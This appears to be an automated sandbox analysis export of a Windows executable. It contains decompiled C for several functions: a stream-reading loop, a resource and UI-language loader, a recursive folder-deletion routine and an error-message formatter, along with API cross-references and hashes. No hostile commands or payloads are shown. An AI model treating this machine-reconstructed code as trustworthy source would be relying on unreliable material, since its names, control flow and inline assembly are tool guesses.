																_t544 =  *((intOrPtr*)(_t421 + 8)) -  *_t421;
																__eflags = _t544;
																asm("sbb edx, [eax+0x4]");
																 *_t610 = _t544;
																 *((intOrPtr*)(_t610 + 4)) =  *((intOrPtr*)(_t421 + 0xc));
																 *(_t468 + _t597 * 4) = _t610;
																goto L70;
															}
															 *(_t468 + _t597 * 4) =  *((intOrPtr*)(_t617[0x16] + 0x28)) + ( *((intOrPtr*)( *((intOrPtr*)(_t617 - 0x10)) + 4 + _t419 * 8)) +  *(_t617 - 0x2c)) * 8;
															L70:
															_t597 = _t597 + 1;
															_t610 = _t610 + 8;
															_t617[0xa] = _t617[0xa] + 1;
															__eflags = _t597 - _t617[1];
														} while (_t597 < _t617[1]);
														goto L71;
													}
													__eflags = _t617[0x17];
													_t602 =  *((intOrPtr*)( *_t411 + 0xc))(_t411, 0 | _t617[0x17] != 0x00000000);
													_t426 = _t617[0x10];
													__eflags = _t602;
													if(_t602 != 0) {
														goto L81;
													}
													__eflags = _t426;
													if(_t426 != 0) {
														 *((intOrPtr*)( *_t426 + 8))(_t426);
													}
													goto L64;
												}
												 *(_t617[0x1d]) = 1;
												_t430 = _t617[0x1c];
												_t598 = 0;
												__eflags = _t430;
												if(_t430 == 0) {
													 *((intOrPtr*)( *_t529 + 8))(_t529);
													goto L4;
												}
												_t617[0xe] = 0;
												_t602 =  *((intOrPtr*)( *_t430 + 0xc))(_t430,  &(_t617[0xe]));
												__eflags = _t602;
												if(_t602 != 0) {
													__imp__#6(_t617[0xe]);
													_t426 = _t617[0xb];
													__eflags = _t426;
													goto L82;
												}
												_t611 = _t617[0x1f];
												 *(_t617[0x1e]) = 1;
												_t435 =  *_t611;
												 *(_t611 + 4) = 0;
												 *_t435 = 0;
												__eflags = _t617[0xe];
												if(_t617[0xe] != 0) {
													_t435 = E00411BE5(_t611, _t617[0xe]);
													_t598 =  *(_t611 + 4);
												}
												_t469 = _t598 + _t598;
												_push(_t469);
												L004191BC();
												_t554 = 0;
												_t612 = _t435;
												__eflags = _t598;
												if(_t598 == 0) {
													L57:
													_t436 = _t617[0xb];
													_t437 =  *((intOrPtr*)( *_t436 + 0xc))(_t436, _t612, _t469);
													_t595 = _t437;
													L004191B0();
													__imp__#6(_t617[0xe], _t612);
													_t438 = _t617[0xb];
													__eflags = _t595;
													if(_t595 != 0) {
														__eflags = _t438;
														if(_t438 != 0) {
															 *((intOrPtr*)( *_t438 + 8))(_t438);
														}
														goto L88;
													}
													__eflags = _t438;
													if(_t438 != 0) {
														 *((intOrPtr*)( *_t438 + 8))(_t438);
													}
													goto L60;
												} else {
													do {
														_t442 =  *(_t617[0xe] + _t554 * 2) & 0x0000ffff;
														 *(_t612 + _t554 * 2) = _t442;
														 *((char*)(_t612 + 1 + _t554 * 2)) = _t442 >> 8;
														_t554 = _t554 + 1;
														__eflags = _t554 - _t598;
													} while (_t554 < _t598);
													goto L57;
												}
											} else {
												_t560 =  *((intOrPtr*)(_t608 + 0xc));
												__eflags = _t560 - 0xffffffff;
												if(_t560 > 0xffffffff) {
													 *((intOrPtr*)( *_t406 + 8))(_t406);
													goto L4;
												}
												_t602 =  *((intOrPtr*)( *_t406 + 0xc))(_t406,  *((intOrPtr*)(_t608 + 8)), _t560);
												__eflags = _t602 - 0x80070057;
												if(_t602 == 0x80070057) {
													_t602 = 0x80004001;
												}
												_t426 = _t617[9];
												__eflags = _t602;
												if(_t602 != 0) {
													L81:
													__eflags = _t426;
													L82:
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t426 + 8))(_t426);
													}
													goto L5;
												} else {
													__eflags = _t426;
													if(_t426 != 0) {
														 *((intOrPtr*)( *_t426 + 8))(_t426);
													}
													goto L50;
												}
											}
											L74:
											_t574 =  *( *(_t617[0xf] + 0x58));
											 *((intOrPtr*)(_t574 + 0x14))(_t617[0xd], _t415, _t468);
											_push(_t468);
											L004191B0();
											_push(_t617[0xc]);
											L004191B0();
											_t617[0xd] = _t617[0xd] + 1;
											_t358 = _t617[0xd];
											_t617[5] = _t617[5] + 8;
											_t617[6] = _t617[6] + 0x18;
											__eflags = _t358 -  *(_t617 - 0x14);
										} while (_t358 <  *(_t617 - 0x14));
										_t601 = _t617[0xf];
										_t591 = 0;
										__eflags = 0;
										goto L76;
									} else {
										goto L28;
									}
									while(1) {
										L28:
										_t614 =  *((intOrPtr*)(_t617 - 0x18));
										 *(_t617 - 0x28) =  *(_t617 - 0x28) & 0x00000000;
										 *(_t617 - 0x24) =  *(_t617 - 0x24) & 0x00000000;
										_t447 = E004120C1(0, _t617 - 0x28, __eflags,  *((intOrPtr*)(_t614 + _t590)),  *((intOrPtr*)(_t614 + _t590 + 4)));
										_t617[7] = _t447;
										__eflags = _t447;
										if(_t447 != 0) {
											break;
										}
										_t615 =  *((intOrPtr*)(_t614 + _t590 + 0x10));
										__eflags = _t615 - 1;
										if(_t615 != 1) {
											__eflags =  *(_t617 - 0x24);
											if( *(_t617 - 0x24) == 0) {
												L31:
												E0041212C(_t617 - 0x28);
												goto L4;
											}
											__eflags =  *((intOrPtr*)(_t617 - 0x1c)) - _t615;
											if( *((intOrPtr*)(_t617 - 0x1c)) != _t615) {
												goto L31;
											}
											L34:
											_t574 = _t617 - 0x28;
											 *((intOrPtr*)( *( *(_t617[0xf] + 0x58)) + 4))(_t574);
											E0041212C(_t617 - 0x28);
											_t617[0x10] = _t617[0x10] + 1;
											_t590 = _t590 + 0x18;
											__eflags = _t617[0x10] -  *(_t617 - 0x14);
											if(__eflags < 0) {
												continue;
											} else {
												_t601 = _t617[0xf];
												goto L36;
											}
										}
										__eflags =  *(_t617 - 0x28) - _t447;
										if( *(_t617 - 0x28) != _t447) {
											goto L34;
										}
										goto L31;
									}
									E0041212C(_t617 - 0x28);
									_t602 = _t617[7];
									goto L5;
								} else {
									_t602 = _t350;
									L5:
									_push( *((intOrPtr*)(_t617 - 0x3c)));
									L004191B0();
									E00413ABD(_t617 - 0x7c);
									E00414189(_t617 - 0x18, _t602);
									_t365 = _t602;
									goto L2;
								}
							}
							_t574 = _t601 + 4;
							_t456 = E00413C65(_t617 - 0x7c, _t478, _t574);
							__eflags = _t456;
							if(_t456 != 0) {
								goto L37;
							}
							goto L17;
						}
						_t616 =  *_t478;
						_t478 =  *(_t478 + 4);
						__eflags = _t478 - _t344;
						if(__eflags < 0) {
							__eflags = _t616 - _t573;
							L12:
							if(__eflags != 0) {
								L14:
								_t617[0x17] = 0;
								goto L15;
							}
							_t617[0x17] = 1;
							__eflags = _t478 - _t344;
							if(_t478 == _t344) {
								goto L15;
							}
							goto L14;
						}
						if(__eflags > 0) {
							goto L10;
						}
						__eflags = _t616 - _t573;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L10;
					}
					L4:
					_t602 = 0x80004001;
					goto L5;
				} else {
					E00414189(_t617 - 0x18, __esi);
					_t365 = 0x80004001;
					L2:
					return _t365;
				}
			}

0x004142cc
0x004142cd
0x004142d8
0x004142dc
0x004142df
0x004142e7
0x004142ea
0x004142f6
0x004142fb
0x004142fe
0x00414301
0x00414304
0x00414307
0x0041430a
0x00414314
0x00414324
0x00414327
0x0041433f
0x00414343
0x0041434a
0x0041434d
0x00414350
0x00414359
0x00414361
0x00414366
0x00414368
0x0041439a
0x0041439d
0x004143a0
0x004143a3
0x004143a7
0x004143aa
0x004143ae
0x004143b0
0x004143d8
0x004143d8
0x004143db
0x004143de
0x004143f3
0x004143f3
0x004143f6
0x004143f8
0x004143fd
0x00414400
0x00414400
0x00414400
0x00414400
0x00414404
0x00414409
0x0041440f
0x00414411
0x0041441e
0x0041441e
0x00414413
0x00414417
0x00414417
0x00414424
0x00414427
0x0041442c
0x0041442f
0x00414431
0x00414438
0x00414438
0x00414433
0x00414433
0x00414433
0x0041443a
0x0041443d
0x00414443
0x00414445
0x00414447
0x00414449
0x00414452
0x00414455
0x00414458
0x004144cf
0x004144d6
0x004144e2
0x004144e7
0x004144ea
0x004144ef
0x004144f8
0x004144fb
0x004144fd
0x00414500
0x00414503
0x00414506
0x00414509
0x00414788
0x00414788
0x0041478b
0x0041478d
0x00414796
0x00414796
0x0041479d
0x0041479d
0x004147a0
0x004147a2
0x004147a5
0x004147a8
0x004147ab
0x004147b1
0x004147b3
0x0041481d
0x0041481d
0x004147b5
0x004147b7
0x004147b7
0x0041481f
0x00414822
0x00414824
0x00414829
0x00414829
0x0041482c
0x00414830
0x00414833
0x0041487f
0x0041487f
0x00414882
0x00414885
0x00414983
0x00414989
0x0041498e
0x00414992
0x00414995
0x004149ae
0x004149ae
0x004149b2
0x00414a43
0x00414a44
0x00414a49
0x00414a4d
0x00414a4f
0x00414a54
0x00414a54
0x00414a5a
0x004143c1
0x004143c1
0x00000000
0x004143c1
0x004149b8
0x004149ba
0x004149bd
0x004149c0
0x004149c5
0x004149c8
0x004149cd
0x004149cf
0x004149d1
0x004149d3
0x004149d9
0x004149db
0x00414a03
0x00414a03
0x004149dd
0x004149e2
0x004149e2
0x00414a09
0x00414a0e
0x00414a0e
0x004149cf
0x00414a14
0x00414a17
0x00414a19
0x00414a1b
0x00414a1d
0x00414a1d
0x00414a2e
0x00414a30
0x00414a32
0x00414a37
0x00414a37
0x00414a3a
0x00414a3b
0x004149e9
0x004149e9
0x004149ec
0x004149ee
0x004149f3
0x004149f3
0x004149f9
0x00000000
0x004149f9
0x0041499a
0x0041499d
0x0041499f
0x0041499f
0x004149a1
0x004149a6
0x004149a8
0x004149ab
0x004149ab
0x004149ab
0x00000000
0x00000000
0x00000000
0x00000000
0x0041488b
0x0041488b
0x0041488b
0x00414891
0x00414895
0x0041489a
0x0041489d
0x004148a0
0x004148a3
0x004148a7
0x004148cf
0x004148d1
0x004148d7
0x004148d9
0x004148ee
0x004148ee
0x004148ee
0x004148db
0x004148db
0x004148df
0x004148e5
0x004148e9
0x004148e9
0x004148f8
0x00414900
0x00414905
0x00000000
0x00414905
0x004148a9
0x004148b8
0x004148ba
0x004148bc
0x00000000
0x00000000
0x004148c8
0x0041490a
0x0041490a
0x0041490c
0x00414911
0x00414914
0x00414916
0x00414918
0x0041491b
0x00414921
0x00414924
0x00414924
0x00414931
0x00414939
0x0041493c
0x00414941
0x00414944
0x00414951
0x00414954
0x00414958
0x0041495c
0x0041495f
0x00414962
0x00414965
0x00414969
0x0041496b
0x00414970
0x00414970
0x00414973
0x00414974
0x00414977
0x00414977
0x00414980
0x00000000
0x00414835
0x0041483e
0x00414849
0x00414854
0x00414856
0x00414858
0x00414878
0x0041487d
0x0041487d
0x00000000
0x0041487d
0x0041485a
0x0041485d
0x0041485f
0x00414864
0x00414864
0x0041486a
0x00414801
0x00414801
0x00000000
0x00414801
0x00414833
0x0041450f
0x0041450f
0x00414512
0x00414515
0x00414518
0x00414521
0x00414529
0x0041452c
0x0041452f
0x00414531
0x00414533
0x0041454c
0x0041454f
0x00414535
0x00414535
0x00414537
0x00414537
0x00414554
0x00414562
0x00414564
0x00414567
0x00414569
0x004145a6
0x004145a8
0x004145b6
0x004145b8
0x004145bb
0x004145bd
0x0041466c
0x0041466c
0x00414671
0x0041467f
0x00414681
0x00414684
0x00414686
0x004146ae
0x004146b1
0x004146b8
0x004146bb
0x004146c4
0x004146c9
0x004146cc
0x004146ce
0x004146d0
0x00414734
0x00414734
0x00414737
0x00414739
0x00414743
0x00414749
0x00414749
0x00000000
0x00414749
0x0041473e
0x00414741
0x00000000
0x00000000
0x00000000
0x00414741
0x004146d2
0x004146d5
0x004146db
0x004146e0
0x004146e2
0x00414702
0x00414707
0x00414709
0x00414808
0x00414809
0x0041480e
0x00414811
0x00000000
0x00414817
0x00414712
0x00414718
0x00414718
0x0041471d
0x00414720
0x00414722
0x00414725
0x00000000
0x00414725
0x004146f7
0x00414728
0x00414728
0x00414729
0x0041472c
0x0041472f
0x0041472f
0x00000000
0x004146d5
0x0041468c
0x00414697
0x00414699
0x0041469c
0x0041469e
0x00000000
0x00000000
0x004146a4
0x004146a6
0x004146ab
0x004146ab
0x00000000
0x004146a6
0x004145c6
0x004145c9
0x004145cc
0x004145ce
0x004145d0
0x004147df
0x00000000
0x004147df
0x004145dd
0x004145e3
0x004145e5
0x004145e7
0x004147ea
0x004147f0
0x004147f3
0x00000000
0x004147f3
0x004145f0
0x004145f3
0x004145f6
0x004145fa
0x004145fd
0x00414600
0x00414603
0x0041460a
0x0041460f
0x0041460f
0x00414612
0x00414615
0x00414616
0x0041461c
0x0041461e
0x00414620
0x00414622
0x0041463a
0x0041463a
0x00414642
0x00414646
0x00414648
0x00414651
0x00414657
0x0041465a
0x0041465c
0x004147f7
0x004147f9
0x004147fe
0x004147fe
0x00000000
0x004147f9
0x00414662
0x00414664
0x00414669
0x00414669
0x00000000
0x00414624
0x00414624
0x00414627
0x0041462b
0x00414631
0x00414635
0x00414636
0x00414636
0x00000000
0x00414624
0x0041456b
0x0041456b
0x0041456e
0x00414571
0x004147c1
0x00000000
0x004147c1
0x00414582
0x00414584
0x0041458a
0x0041458c
0x0041458c
0x00414591
0x00414594
0x00414596
0x004147c9
0x004147c9
0x004147cb
0x004147cb
0x004147d4
0x004147d4
0x00000000
0x0041459c
0x0041459c
0x0041459e
0x004145a3
0x004145a3
0x00000000
0x0041459e
0x00414596
0x0041474c
0x00414752
0x00414759
0x0041475c
0x0041475d
0x00414762
0x00414765
0x0041476a
0x0041476d
0x00414770
0x00414774
0x0041477a
0x0041477a
0x00414783
0x00414786
0x00414786
0x00000000
0x00000000
0x00000000
0x00000000
0x0041445a
0x0041445a
0x0041445a
0x0041445d
0x00414461
0x00414471
0x00414476
0x00414479
0x0041447b
0x00000000
0x00000000
0x00414481
0x00414485
0x00414488
0x0041449c
0x004144a0
0x0041448f
0x00414492
0x00000000
0x00414492
0x004144a2
0x004144a5
0x00000000
0x00000000
0x004144a7
0x004144af
0x004144b3
0x004144b9
0x004144be
0x004144c4
0x004144c7
0x004144ca
0x00000000
0x004144cc
0x004144cc
0x00000000
0x004144cc
0x004144ca
0x0041448a
0x0041448d
0x00000000
0x00000000
0x00000000
0x0041448d
0x0041453f
0x00414544
0x00000000
0x0041444b
0x0041444b
0x0041436f
0x0041436f
0x00414372
0x0041437b
0x00414383
0x00414388
0x00000000
0x0041438a
0x00414449
0x004143e0
0x004143e6
0x004143eb
0x004143ed
0x00000000
0x00000000
0x00000000
0x004143ed
0x004143b2
0x004143b4
0x004143b7
0x004143b9
0x004143c8
0x004143ca
0x004143ca
0x004143d4
0x004143d4
0x00000000
0x004143d4
0x004143cc
0x004143d0
0x004143d2
0x00000000
0x00000000
0x00000000
0x004143d2
0x004143bb
0x00000000
0x00000000
0x004143bd
0x004143bf
0x00000000
0x00000000
0x00000000
0x004143bf
0x0041436a
0x0041436a
0x00000000
0x00414329
0x0041432c
0x00414331
0x00414336
0x0041433c
0x0041433c

APIs

Part of subcall function 00416CB7: _CxxThrowException.MSVCRT(?,0041C9D4), ref: 00416CFF

??3@YAXPAX@Z.MSVCRT ref: 00414372

Part of subcall function 00414189: ??3@YAXPAX@Z.MSVCRT ref: 0041418F
Part of subcall function 00414189: ??3@YAXPAX@Z.MSVCRT ref: 00414197

??2@YAPAXI@Z.MSVCRT ref: 00414409
??2@YAPAXI@Z.MSVCRT ref: 00414616
??3@YAXPAX@Z.MSVCRT ref: 00414648
SysFreeString.OLEAUT32(?), ref: 00414651
??3@YAXPAX@Z.MSVCRT ref: 0041475D
??3@YAXPAX@Z.MSVCRT ref: 00414765
??2@YAPAXI@Z.MSVCRT ref: 004147AB
SysFreeString.OLEAUT32(?), ref: 004147EA

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@$FreeString$ExceptionThrow
String ID:
API String ID: 3050852170-0
Opcode ID: b8902f7d5509d4900eece9f231cfced490ddabbbbf1eeb8a3bf3be8341901ebb
Instruction ID: 63c1d7170cb7f9ccbcc5f7ed3098d04a866bf1aea97f2543f5bdc1a1635b749d
Opcode Fuzzy Hash: b8902f7d5509d4900eece9f231cfced490ddabbbbf1eeb8a3bf3be8341901ebb
Instruction Fuzzy Hash: 82525671A00209DFCB14DF64C894AEE7BB5BF88318F25415AF8169B351DB39ED81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004039F0, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004039F0(CHAR* __ecx, CHAR* __edx, intOrPtr* _a4) {
				struct HINSTANCE__* _v8;
				CHAR* _v12;
				CHAR* _v16;
				short _v80;
				struct HINSTANCE__* _t14;
				void* _t16;
				struct HRSRC__* _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr* _t35;

				_v12 = __edx;
				_v16 = __ecx;
				_t14 = GetModuleHandleW(0);
				_v8 = _t14;
				_t28 = FindResourceExA(_t14, _v16, _v12,  *0x41e730 & 0x0000ffff);
				if(_t28 != 0) {
					L2:
					_t35 = _a4;
					if(_t35 != 0) {
						 *_t35 = SizeofResource(_v8, _t28);
					}
					_t16 = LoadResource(_v8, _t28);
					if(_t16 == 0) {
						L6:
						if( *0x41e734 != 0) {
							L10:
							return 0;
						}
						 *0x41e734 = 1;
						_t29 = GetProcAddress( *0x41e75c, "SetProcessPreferredUILanguages");
						wsprintfW( &_v80, L"%04X%c%04X%c",  *0x41e730 & 0x0000ffff, 0, 0x409, 0);
						if(_t29 != 0) {
							L9:
							 *_t29(4,  &_v80, 0);
							goto L10;
						}
						_t29 = GetProcAddress( *0x41e75c, "SetThreadPreferredUILanguages");
						if(_t29 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						return LockResource(_t16);
					}
				}
				_t28 = FindResourceExA(_v8, _v16, _v12, 0x409);
				if(_t28 == 0) {
					goto L6;
				}
				goto L2;
			}

0x004039fb
0x004039fe
0x00403a01
0x00403a18
0x00403a21
0x00403a2a
0x00403a3e
0x00403a3e
0x00403a43
0x00403a4f
0x00403a4f
0x00403a55
0x00403a5d
0x00403a68
0x00403a6f
0x00403ad0
0x00000000
0x00403ad0
0x00403a82
0x00403a90
0x00403aa6
0x00403ab1
0x00403ac6
0x00403ace
0x00000000
0x00403ace
0x00403ac0
0x00403ac4
0x00000000
0x00000000
0x00000000
0x00403a5f
0x00000000
0x00403a60
0x00403a5d
0x00403a38
0x00403a3c
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00403A01
FindResourceExA.KERNEL32(00000000,?,?), ref: 00403A1F
FindResourceExA.KERNEL32(?,?,?,00000409), ref: 00403A36
SizeofResource.KERNEL32(?,00000000), ref: 00403A49
LoadResource.KERNEL32(?,00000000), ref: 00403A55
LockResource.KERNEL32(00000000), ref: 00403A60
GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 00403A8C
wsprintfW.USER32 ref: 00403AA6
GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 00403ABE

Strings

SetProcessPreferredUILanguages, xrefs: 00403A77
%04X%c%04X%c, xrefs: 00403AA0
SetThreadPreferredUILanguages, xrefs: 00403AB3

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
API String ID: 2090077119-3413765421
Opcode ID: 8f248b3f3ccdae2e627c25948350bafec117c70763480a7fd32ce54566ccef8a
Instruction ID: ed0741534da578f5e66d3de38586fa322f1091544de9e69cad048277579e345e
Opcode Fuzzy Hash: 8f248b3f3ccdae2e627c25948350bafec117c70763480a7fd32ce54566ccef8a
Instruction Fuzzy Hash: C2214175A01308BBDB119FA5DD45BAE7FBCEB04701F108036FA40A22A1E7B59E50DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040340F, Relevance: 18.1, APIs: 12, Instructions: 91
filestringCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0040340F(WCHAR* __ecx, void* __edx, void* __eflags) {
				WCHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				void* _t26;
				int _t29;
				int _t36;
				int _t37;
				int _t44;
				WCHAR* _t45;
				void* _t54;

				_t54 = __edx;
				_t45 = __ecx;
				E00411B84( &_v16, __ecx);
				E00411CA3( &_v16, 0x41abcc);
				_t26 = FindFirstFileW(_v16,  &_v612);
				_v20 = _t26;
				if(_t26 == 0xffffffff) {
					L11:
					SetCurrentDirectoryW( *0x41e794);
					if(SetFileAttributesW(_t45, 0) == 0 || RemoveDirectoryW(_t45) == 0) {
						goto L14;
					} else {
						_push(_v16);
						L004191B0();
						_t29 = 1;
					}
				} else {
					do {
						E00411BE5( &_v16, _t45);
						E004015EC( &_v16, 0x5c);
						E00411CA3( &_v16,  &(_v612.cFileName));
						if((_v612.dwFileAttributes & 0x00000010) == 0) {
							_t36 = SetFileAttributesW(_v16, 0);
							__eflags = _t36;
							if(_t36 == 0) {
								goto L14;
							} else {
								_t37 = DeleteFileW(_v16);
								goto L8;
							}
						} else {
							if(lstrcmpW( &(_v612.cFileName), 0x41abc8) == 0) {
								goto L9;
							} else {
								_t44 = lstrcmpW( &(_v612.cFileName), 0x41abc0);
								_t61 = _t44;
								if(_t44 == 0) {
									goto L9;
								} else {
									_t37 = E0040340F(_v16, _t54, _t61);
									L8:
									if(_t37 == 0) {
										L14:
										_push(_v16);
										L004191B0();
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L9;
									}
								}
							}
						}
						goto L15;
						L9:
					} while (FindNextFileW(_v20,  &_v612) != 0);
					FindClose(_v20);
					goto L11;
				}
				L15:
				return _t29;
			}

0x0040340f
0x0040341a
0x00403421
0x0040342e
0x0040343d
0x00403449
0x0040344f
0x004034ed
0x004034f3
0x00403500
0x00000000
0x0040350d
0x0040350d
0x00403510
0x00403517
0x00403517
0x00403455
0x0040345b
0x0040345f
0x00403469
0x00403478
0x00403484
0x004034b9
0x004034bb
0x004034bd
0x00000000
0x004034bf
0x004034c2
0x00000000
0x004034c2
0x00403486
0x00403496
0x00000000
0x00403498
0x004034a4
0x004034a6
0x004034a8
0x00000000
0x004034aa
0x004034ad
0x004034c8
0x004034ca
0x0040351a
0x0040351a
0x0040351d
0x00403522
0x00403522
0x00000000
0x00000000
0x00000000
0x004034ca
0x004034a8
0x00403496
0x00000000
0x004034cc
0x004034dc
0x004034e7
0x00000000
0x004034e7
0x00403524
0x00403529

APIs

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

FindFirstFileW.KERNEL32(?,?,0041ABCC,?,00000000,?,00000000), ref: 0040343D
lstrcmpW.KERNEL32(?,0041ABC8,?,0000005C,?), ref: 00403492
lstrcmpW.KERNEL32(?,0041ABC0), ref: 004034A4
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?), ref: 004034B9
DeleteFileW.KERNEL32(?), ref: 004034C2
FindNextFileW.KERNEL32(?,00000010), ref: 004034D6
FindClose.KERNEL32(?), ref: 004034E7
SetCurrentDirectoryW.KERNEL32 ref: 004034F3
SetFileAttributesW.KERNEL32(?,00000000), ref: 004034FC
RemoveDirectoryW.KERNEL32(?), ref: 00403503
??3@YAXPAX@Z.MSVCRT ref: 00403510

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

??3@YAXPAX@Z.MSVCRT ref: 0040351D

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: File$??3@Findmemcpy$AttributesDirectorylstrcmp$??2@CloseCurrentDeleteFirstNextRemove
String ID:
API String ID: 1254520193-0
Opcode ID: 9b31627a932f6071aa4177330747ff234158f9032b054607de35a00c98215738
Instruction ID: 184ccade124785ef3e2e24a1a723902e2d1148a2b40179e28e9aacba309f937e
Opcode Fuzzy Hash: 9b31627a932f6071aa4177330747ff234158f9032b054607de35a00c98215738
Instruction Fuzzy Hash: BC31AE31A05109BADB12AFB1ED49FEE7B7CAF00315F1041B7A512B11E1EB78AF50CA18

Uniqueness

Uniqueness Score: -1.00%

Function 0040976C, Relevance: 16.6, APIs: 11, Instructions: 94
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040976C(void* __edx, short _a4, WCHAR* _a8, char _a12) {
				char* _v8;
				long _v12;
				short _v2060;
				WCHAR* _t28;
				long _t32;
				int _t36;
				WCHAR* _t38;
				WCHAR* _t41;
				WCHAR* _t50;
				char* _t52;
				short _t62;
				void* _t65;
				signed int _t66;
				signed int _t69;
				long _t75;

				_t65 = __edx;
				_t28 = E00403DC8(_a8);
				_t52 =  &_a12;
				_v8 = _t52;
				wvsprintfW( &_v2060, _t28, _t52);
				if(_a4 == 0) {
					L4:
					return E00409686( &_v2060, _t65);
				}
				_t32 = GetLastError();
				_v12 = _t32;
				if(FormatMessageW(0x1100, 0, _t32,  *0x41e730 & 0x0000ffff,  &_a4, 0,  &_v8) != 0) {
					L3:
					_t69 = lstrlenW( &_v2060);
					_t36 = lstrlenW(_a4);
					_t37 = _t36 + _t69 + 2;
					_t66 = 2;
					_t38 = (_t36 + _t69 + 2) * _t66;
					_push( ~(0 | _t75 > 0x00000000) | _t38);
					L004191BC();
					_t50 = _t38;
					lstrcpyW(_t50,  &_v2060);
					_t62 = 0xa;
					_t41 =  &(_t50[_t69]);
					 *_t41 = _t62;
					lstrcpyW( &(_t41[1]), _a4);
					E00409686(_t50, _t37 * _t66 >> 0x20);
					_push(_t50);
					L004191B0();
					return LocalFree(_a4);
				}
				_t75 = FormatMessageW(0x1100, 0, _v12, 0,  &_a4, 0,  &_v8);
				if(_t75 == 0) {
					goto L4;
				}
				goto L3;
			}

0x0040976c
0x0040977b
0x00409780
0x0040978c
0x0040978f
0x0040979a
0x0040984f
0x00000000
0x00409855
0x004097a0
0x004097c5
0x004097cc
0x004097e3
0x004097f5
0x004097f7
0x004097fd
0x00409801
0x00409802
0x0040980b
0x0040980c
0x00409817
0x00409822
0x00409826
0x00409827
0x0040982a
0x00409834
0x00409838
0x0040983d
0x0040983e
0x00000000
0x00409847
0x004097df
0x004097e1
0x00000000
0x00000000
0x00000000

APIs

wvsprintfW.USER32(?,00000000,?), ref: 0040978F
GetLastError.KERNEL32 ref: 004097A0
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00BC25D8), ref: 004097C8
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00BC25D8), ref: 004097DD
lstrlenW.KERNEL32(?), ref: 004097F0
lstrlenW.KERNEL32(?), ref: 004097F7
??2@YAPAXI@Z.MSVCRT ref: 0040980C
lstrcpyW.KERNEL32 ref: 00409822
lstrcpyW.KERNEL32 ref: 00409834
??3@YAXPAX@Z.MSVCRT ref: 0040983E
LocalFree.KERNEL32(?), ref: 00409847

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: 80e364aa17a3db8f7dbc397a400d13c0913c97b37e757fb4a27a93367a636c63
Instruction ID: ce60ff98e11a79a3a696769abfe051056d5f9fd39bbc67ce90a5294729797a98
Opcode Fuzzy Hash: 80e364aa17a3db8f7dbc397a400d13c0913c97b37e757fb4a27a93367a636c63
Instruction Fuzzy Hash: 22216476900118FFDB14AFA1DC85DEE7BBCEF08354F00847AF90597191EA349E848BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004178D6, Relevance: 11.0, APIs: 7, Instructions: 450
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

